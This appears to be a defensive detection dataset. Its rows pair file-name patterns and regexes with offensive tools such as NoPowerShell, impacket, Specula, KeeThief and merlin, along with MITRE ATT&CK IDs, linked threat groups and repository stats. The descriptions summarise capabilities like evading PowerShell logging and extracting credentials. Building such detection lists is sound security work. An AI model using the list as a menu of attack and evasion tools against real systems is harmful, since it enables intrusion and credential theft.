"*\GetADGroupCommand.cs",".{0,1000}\\GetADGroupCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15537"
"*\GetADGroupMemberCommand.cs",".{0,1000}\\GetADGroupMemberCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15538"
"*\GetAdmin.log*",".{0,1000}\\GetAdmin\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15539"
"*\GetAdmin.ps1*",".{0,1000}\\GetAdmin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15540"
"*\GetADObjectCommand.cs",".{0,1000}\\GetADObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15541"
"*\GetADTrustCommand.cs",".{0,1000}\\GetADTrustCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15542"
"*\GetADUserCommand.cs",".{0,1000}\\GetADUserCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15543"
"*\GetADUsers.py*",".{0,1000}\\GetADUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15544"
"*\getallkeysregistry.py*",".{0,1000}\\getallkeysregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15545"
"*\getallkeysregistry.txt*",".{0,1000}\\getallkeysregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15546"
"*\Getallregkeys.txt*",".{0,1000}\\Getallregkeys\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15547"
"*\Getallregvalues.txt*",".{0,1000}\\Getallregvalues\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15548"
"*\getallvaluesregistry.py*",".{0,1000}\\getallvaluesregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15549"
"*\getallvaluesregistry.txt*",".{0,1000}\\getallvaluesregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15550"
"*\getArch.py*",".{0,1000}\\getArch\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15551"
"*\get-attack.ps1*",".{0,1000}\\get\-attack\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15552"
"*\GetBrowsers.ps1*",".{0,1000}\\GetBrowsers\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","15554"
"*\GetChildItemCommand.cs",".{0,1000}\\GetChildItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15555"
"*\GetClipboardCommand.cs",".{0,1000}\\GetClipboardCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15556"
"*\GetCommandCommand.cs",".{0,1000}\\GetCommandCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15557"
"*\GetComputerInfoCommand.cs",".{0,1000}\\GetComputerInfoCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15558"
"*\GetContentCommand.cs",".{0,1000}\\GetContentCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15559"
"*\Get-Credential.sql*",".{0,1000}\\Get\-Credential\.sql.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","15560"
"*\get-desc-users.py*",".{0,1000}\\get\-desc\-users\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15561"
"*\GetDnsClientCacheCommand.cs",".{0,1000}\\GetDnsClientCacheCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15562"
"*\GetFullPrivs\GetFullPrivs*",".{0,1000}\\GetFullPrivs\\GetFullPrivs.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","15563"
"*\GetFullPrivsDrv.cpp*",".{0,1000}\\GetFullPrivsDrv\.cpp.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","15564"
"*\GetFullPrivsDrv.exe*",".{0,1000}\\GetFullPrivsDrv\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","15565"
"*\Get-FunctionHash.ps1*",".{0,1000}\\Get\-FunctionHash\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","15566"
"*\Get-GPPPassword.ps1*",".{0,1000}\\Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15567"
"*\Get-GPPPassword.ps1*",".{0,1000}\\Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15568"
"*\Get-GPPPassword.py*",".{0,1000}\\Get\-GPPPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15569"
"*\GetHelpCommand.cs",".{0,1000}\\GetHelpCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15570"
"*\GetHotFixCommand.cs",".{0,1000}\\GetHotFixCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15571"
"*\Get-InfectedThread.ps1*",".{0,1000}\\Get\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15572"
"*\Get-InjectedThread.ps1*",".{0,1000}\\Get\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15573"
"*\GetItemPropertyCommand.cs",".{0,1000}\\GetItemPropertyCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15574"
"*\GetItemPropertyValueCommand.cs",".{0,1000}\\GetItemPropertyValueCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15575"
"*\GetLAPSPassword.py*",".{0,1000}\\GetLAPSPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15576"
"*\GetLocalGroupCommand.cs",".{0,1000}\\GetLocalGroupCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15577"
"*\GetLocalGroupMemberCommand.cs",".{0,1000}\\GetLocalGroupMemberCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15578"
"*\GetLocalUserCommand.cs",".{0,1000}\\GetLocalUserCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15579"
"*\getlsasrvaddr.exe*",".{0,1000}\\getlsasrvaddr\.exe.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","15580"
"*\GetMoney.exe*",".{0,1000}\\GetMoney\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15581"
